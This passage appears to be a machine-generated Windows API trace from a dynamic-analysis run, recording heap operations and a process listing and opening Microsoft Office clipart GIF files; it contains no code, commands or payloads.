Flags=0x0, Size=0x20) returned 0x885b8 [0100.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0100.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0100.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0100.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0100.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0100.227] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78610 [0100.264] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1113bba3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1113bba3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.265] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2340, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00004_.GIF", cAlternateFileName="")) returned 1 [0100.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0100.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0100.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0100.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0100.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0100.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0100.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0100.266] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.266] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.266] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.266] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0100.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.266] AreFileApisANSI () returned 1 [0100.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0100.266] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.266] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0100.267] AreFileApisANSI () returned 1 [0100.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0100.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 69 [0100.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.268] GetFileType (hFile=0x27c) returned 0x1 [0100.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0100.268] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.269] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.269] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.269] CloseHandle (hObject=0x27c) returned 1 [0100.270] AreFileApisANSI () returned 1 [0100.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a958 [0100.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 69 [0100.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.270] GetFileType (hFile=0x27c) returned 0x1 [0100.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0100.271] CloseHandle (hObject=0x27c) returned 1 [0100.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0100.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0100.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0100.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0100.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0100.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0100.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.272] AreFileApisANSI () returned 1 [0100.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0100.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF") returned 69 [0100.272] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00004_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00004_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2340)) returned 1 [0100.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0100.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0100.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.272] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd790bed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c30, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00011_.GIF", cAlternateFileName="")) returned 1 [0100.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0100.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0100.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0100.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0100.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0100.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0100.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0100.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0100.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0100.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0100.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.273] AreFileApisANSI () returned 1 [0100.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0100.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.273] AreFileApisANSI () returned 1 [0100.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b110 [0100.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 69 [0100.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.274] GetFileType (hFile=0x27c) returned 0x1 [0100.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0100.274] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.275] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.275] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.275] CloseHandle (hObject=0x27c) returned 1 [0100.275] AreFileApisANSI () returned 1 [0100.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0100.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 69 [0100.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.276] GetFileType (hFile=0x27c) returned 0x1 [0100.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0100.276] CloseHandle (hObject=0x27c) returned 1 [0100.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0100.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0100.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0100.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0100.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: 